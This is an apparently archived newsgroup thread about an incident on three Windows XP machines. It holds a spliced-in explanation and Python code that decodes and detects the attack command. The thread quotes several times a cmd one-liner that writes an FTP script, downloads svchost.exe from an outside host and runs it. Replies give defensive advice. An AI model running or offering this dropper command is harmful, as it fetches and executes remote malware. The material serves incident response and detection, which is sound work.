
Virus Activity?



Guest ctowndu33
Posted

We had three users (all with XP SP2) that all of a sudden this morning had

their task manager open up along with a command prompt. In the command

prompt, a statement was input along the lines of the following....

 

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &svchost.exe

 

 

Anyone seen anything like this before? We haven't approved any Windows

Updates or anything like that (even though I wouldn't think that would have

anything to do with this). That is not a typo (above in the statement where

it says mircosoft password). Any help would be appreciated. We saw three at

the exact same time and then haven't seen anymore (we have about 100 Windows

XP SP2 machines).

 

Thanks in advance,

ctowndu33
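What the posted one-liner actually does, decoded by an added example that is not part of the original post or any reply: each `echo ... >> o` appends one line to a file named `o` in the current directory, producing a four-line FTP script (`open ms.microsoft.com 21`, `user mircosoft password`, `get svchost.exe`, `quit`); `ftp -n -s:o` then runs that script non-interactively (`-n` suppresses auto-login so the `user` line supplies the credentials), `del /F /Q o` removes the script, and the bare `svchost.exe` runs whatever was downloaded, since cmd.exe resolves a bare name from the current directory before searching PATH (the real svchost.exe lives in %SystemRoot%\system32). The Python below parses such command lines into the script they write and the indicators worth hunting for on the remaining machines, and gives a predicate that flags this pattern in process-creation logs. The sample command line is the one quoted in the post; the benign sample is constructed; the parser is deliberately simple (it ignores quoting and `^` escapes).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Sample: the one-liner quoted in the post. The "mircosoft" typo is kept on
# purpose, as the poster notes it is not a transcription error.
POSTED_CMDLINE = (
    "cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o "
    "&echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &svchost.exe"
)

# Constructed benign sample: a job that runs ftp against a script that already
# exists on disk and executes nothing afterwards. Must not be flagged.
BENIGN_CMDLINE = "cmd /c ftp -n -s:C:\\jobs\\nightly.ftp backup.example"

CMD_PREFIX_RE = re.compile(r"^\s*cmd(?:\.exe)?\s+/[kc]\s+", re.I)
ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.I)   # echo TEXT >[>] FILE
FTP_RE = re.compile(r"^ftp\b(.*)$", re.I)
SCRIPT_OPT_RE = re.compile(r"-s:(\S+)", re.I)                    # ftp -s:FILE
DEL_RE = re.compile(r"^(?:del|erase)\b.*\s(\S+)$", re.I)


@dataclass
class FtpDropper:
    script_file: Optional[str] = None
    script_lines: List[str] = field(default_factory=list)
    host: Optional[str] = None
    port: int = 21                      # ftp.exe default when "open" gives no port
    user: Optional[str] = None
    password: Optional[str] = None
    fetched: List[str] = field(default_factory=list)
    executed: List[str] = field(default_factory=list)
    ftp_invoked: bool = False
    cleaned_up: bool = False


def split_segments(cmdline: str) -> List[str]:
    """Strip a leading 'cmd /k' or 'cmd /c' and split on the & separator."""
    m = CMD_PREFIX_RE.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    return [s.strip() for s in body.split("&") if s.strip()]


def decode(cmdline: str) -> FtpDropper:
    """Reconstruct the FTP script the command writes and what it does with it."""
    d = FtpDropper()
    scripts: Dict[str, List[str]] = {}   # file name -> lines written via echo
    for seg in split_segments(cmdline):
        m = ECHO_RE.match(seg)
        if m:
            text, op, fname = m.groups()
            lines = scripts.setdefault(fname, [])
            if op == ">":
                lines.clear()            # a single > truncates the file
            lines.append(text)
            continue
        m = FTP_RE.match(seg)
        if m:
            d.ftp_invoked = True
            s = SCRIPT_OPT_RE.search(m.group(1))
            if s:
                d.script_file = s.group(1)
            continue
        m = DEL_RE.match(seg)
        if m:
            d.cleaned_up = d.cleaned_up or m.group(1) == d.script_file
            continue
        # Anything else is run as a program. A bare name resolves from the
        # current directory first, so "svchost.exe" here is the fetched file,
        # not %SystemRoot%\system32\svchost.exe.
        d.executed.append(seg.split()[0])

    d.script_lines = list(scripts.get(d.script_file or "", []))
    for line in d.script_lines:             # interpret the ftp.exe script verbs
        parts = line.split()
        verb = parts[0].lower() if parts else ""
        if verb == "open" and len(parts) >= 2:
            d.host = parts[1]
            if len(parts) >= 3 and parts[2].isdigit():
                d.port = int(parts[2])
        elif verb == "user" and len(parts) >= 2:
            d.user = parts[1]
            d.password = parts[2] if len(parts) >= 3 else None
        elif verb in ("get", "recv", "mget"):
            d.fetched.extend(parts[1:])
    return d


def is_ftp_dropper(cmdline: str) -> bool:
    """Hunting predicate for process-creation logs: script built with echo,
    ftp run non-interactively against it, and a fetched file then executed."""
    d = decode(cmdline)
    fetched = {f.lower() for f in d.fetched}
    return d.ftp_invoked and bool(d.script_lines) and any(
        e.lower() in fetched for e in d.executed)


def indicators(d: FtpDropper) -> Dict[str, object]:
    """Artifacts to search for on other hosts and in firewall/DNS logs."""
    return {
        "outbound": (d.host, d.port),       # egress connection to look for on the PIX
        "credentials": (d.user, d.password),
        "dropped_files": d.fetched,         # a svchost.exe outside system32 is the payload
        "script_file": d.script_file,       # deleted, but may survive in forensic images
        "executed": d.executed,
    }


if __name__ == "__main__":
    for c in (POSTED_CMDLINE, BENIGN_CMDLINE):
        print(is_ftp_dropper(c), indicators(decode(c)))
```

Run it over the CommandLine field of whatever process-creation logging you have; the network-observable artifact is an outbound TCP connection to port 21 from a workstation, which is exactly what an egress rule limited to 80 and 443 would have blocked.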


Guest Lanwench [MVP - Exchange]
Posted

Re: Virus Activity?

 

ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

> We had three users (all with XP SP2) that all of a sudden this

> morning had their task manager open up along with a command prompt.

> In the command prompt, a statement was input along the lines of the

> following....

>

> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password

> >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F

> /Q o &svchost.exe

>

>

> Anyone seen anything like this before? We haven't approved any

> Windows Updates or anything like that (even though I wouldn't think

> that would have anything to do with this). That is not a typo (above

> in the statement where it says mircosoft password). Any help would

> be appreciated. We saw three at the exact same time and then haven't

> seen anymore (we have about 100 Windows XP SP2 machines).

>

> Thanks in advance,

> ctowndu33

 

What antivirus software do you use? What firewall protects your network? Is

the Windows firewall enabled on these machines? I would disconnect them from

the network immediately while you do some checking, although if your other

machines aren't sufficiently protected you may have other creepy crawlies on

the network.

Guest Mike Lowery
Posted

Re: Virus Activity?

 

Looks suspicious. There are viruses that infect svchost.exe. Not sure what to

make of the commands though. "open" is not a Windows application or command and

"ms.microsoft.com" is registered to Microsoft. Of course they could have that

go anywhere if your hosts file was hacked.

 

"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message

news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...

> We had three users (all with XP SP2) that all of a sudden this morning had

> their task manager open up along with a command prompt. In the command

> prompt, a statement was input along the lines of the following....

>

> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o

> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o

> &svchost.exe

>

>

> Anyone seen anything like this before? We haven't approved any Windows

> Updates or anything like that (even though I wouldn't think that would have

> anything to do with this). That is not a typo (above in the statement where

> it says mircosoft password). Any help would be appreciated. We saw three at

> the exact same time and then haven't seen anymore (we have about 100 Windows

> XP SP2 machines).

>

> Thanks in advance,

> ctowndu33

Guest ctowndu33
Posted

Re: Virus Activity?

 

We, for the most part, are up to date on Windows Updates. We are also up to date

on our Symantec CE for the desktops (not my personal choice, but everyone has

current definitions). We have a PIX in place, but our Windows Firewalls are

turned off. Since my post, I was told from one of our users that their

cursor moved. Now, the guy here before me deployed VNC through his image to

all the PCs. Since then, I have created a new image without VNC and in the

last 6 months, we have replaced about 1/2 of the computers. This was a great

excuse to go out and remove the rest of the installs. I can't imagine though

anyone that previously worked here connecting and trying to execute that

command.

 

"Lanwench [MVP - Exchange]" wrote:

> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

> > We had three users (all with XP SP2) that all of a sudden this

> > morning had their task manager open up along with a command prompt.

> > In the command prompt, a statement was input along the lines of the

> > following....

> >

> > cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password

> > >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F

> > /Q o &svchost.exe

> >

> >

> > Anyone seen anything like this before? We haven't approved any

> > Windows Updates or anything like that (even though I wouldn't think

> > that would have anything to do with this). That is not a typo (above

> > in the statement where it says mircosoft password). Any help would

> > be appreciated. We saw three at the exact same time and then haven't

> > seen anymore (we have about 100 Windows XP SP2 machines).

> >

> > Thanks in advance,

> > ctowndu33

>

> What antivirus software do you use? What firewall protects your network? Is

> the Windows firewall enabled on these machines? I would disconnect them from

> the network immediately while you do some checking, although if your other

> machines aren't sufficiently protected you may have other creepy crawlies on

> the network.

>

>

>

Guest Lenny
Posted

Re: Virus Activity?

 

fdisk and format and reinstall

 

 

 

"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message

news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...

> We had three users (all with XP SP2) that all of a sudden this morning had

> their task manager open up along with a command prompt. In the command

> prompt, a statement was input along the lines of the following....

>

> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o

> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o

> &svchost.exe

>

>

> Anyone seen anything like this before? We haven't approved any Windows

> Updates or anything like that (even though I wouldn't think that would

have

> anything to do with this). That is not a typo (above in the statement

where

> it says mircosoft password). Any help would be appreciated. We saw three

at

> the exact same time and then haven't seen anymore (we have about 100

Windows

> XP SP2 machines).

>

> Thanks in advance,

> ctowndu33

Guest Lanwench [MVP - Exchange]
Posted

Re: Virus Activity?

 

ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

> We, for the most part, are up to date on Windows Updates. We are also

> up to date on our Symantec CE for the desktops (not my personal choice,

> but everyone has current definitions).

 

Have you forced a full scan?

What about anti-malware/adware/spyware?

> We have a PIX in place, but

> our Windows Firewalls are turned off.

 

I'd change that (use group policy to manage it, as I expect you have AD).

You can set up exceptions as needed. Also, on your PIX, I'd deny all

outbound Internet access from the LAN IP range used by your workstations

except TCP 80 and 443, for starters - and remove your end users from the

local administrators groups.

> Since my post, I was told from

> one of our users that their cursor moved. Now, the guy here before

> me deployed VNC through his image to all the PCs. Since then, I have

> created a new image without VNC and in the last 6 months, we have

> replaced about 1/2 of the computers. This was a great excuse to go

> out and remove the rest of the installs. I can't imagine though

> anyone that previously worked here connecting and trying to execute

> that command.

 

Is VNC traffic even allowed inbound through your PIX? Close it, if so. What

exactly is open?

 

What you saw looks highly suspicious to me. Someone or something is trying

to run a telnet session for some reason. I can't find anything useful in

google, but you might post in microsoft.public.security for more expert

help.

 

 

 

 

>

> "Lanwench [MVP - Exchange]" wrote:

>

>> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

>>> We had three users (all with XP SP2) that all of a sudden this

>>> morning had their task manager open up along with a command prompt.

>>> In the command prompt, a statement was input along the lines of the

>>> following....

>>>

>>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft

>>> password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F

>>> /Q o &svchost.exe

>>>

>>>

>>> Anyone seen anything like this before? We haven't approved any

>>> Windows Updates or anything like that (even though I wouldn't think

>>> that would have anything to do with this). That is not a typo

>>> (above in the statement where it says mircosoft password). Any

>>> help would be appreciated. We saw three at the exact same time and

>>> then haven't seen anymore (we have about 100 Windows XP SP2

>>> machines).

>>>

>>> Thanks in advance,

>>> ctowndu33

>>

>> What antivirus software do you use? What firewall protects your

>> network? Is the Windows firewall enabled on these machines? I would

>> disconnect them from the network immediately while you do some

>> checking, although if your other machines aren't sufficiently

>> protected you may have other creepy crawlies on the network.

Guest Lanwench [MVP - Exchange]
Posted

Re: Virus Activity?

 

Lenny <here@there.com> wrote:

> fdisk and format and reinstall

 

That's pretty extreme!

 

>

>

>

> "ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message

> news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...

>> We had three users (all with XP SP2) that all of a sudden this

>> morning had their task manager open up along with a command prompt.

>> In the command prompt, a statement was input along the lines of the

>> following....

>>

>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft

>> password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n

>> -s:o &del /F /Q o &svchost.exe

>>

>>

>> Anyone seen anything like this before? We haven't approved any

>> Windows Updates or anything like that (even though I wouldn't think

>> that would have anything to do with this). That is not a typo

>> (above in the statement where it says mircosoft password). Any help

>> would be appreciated. We saw three at the exact same time and then

>> haven't seen anymore (we have about 100 Windows XP SP2 machines).

>>

>> Thanks in advance,

>> ctowndu33
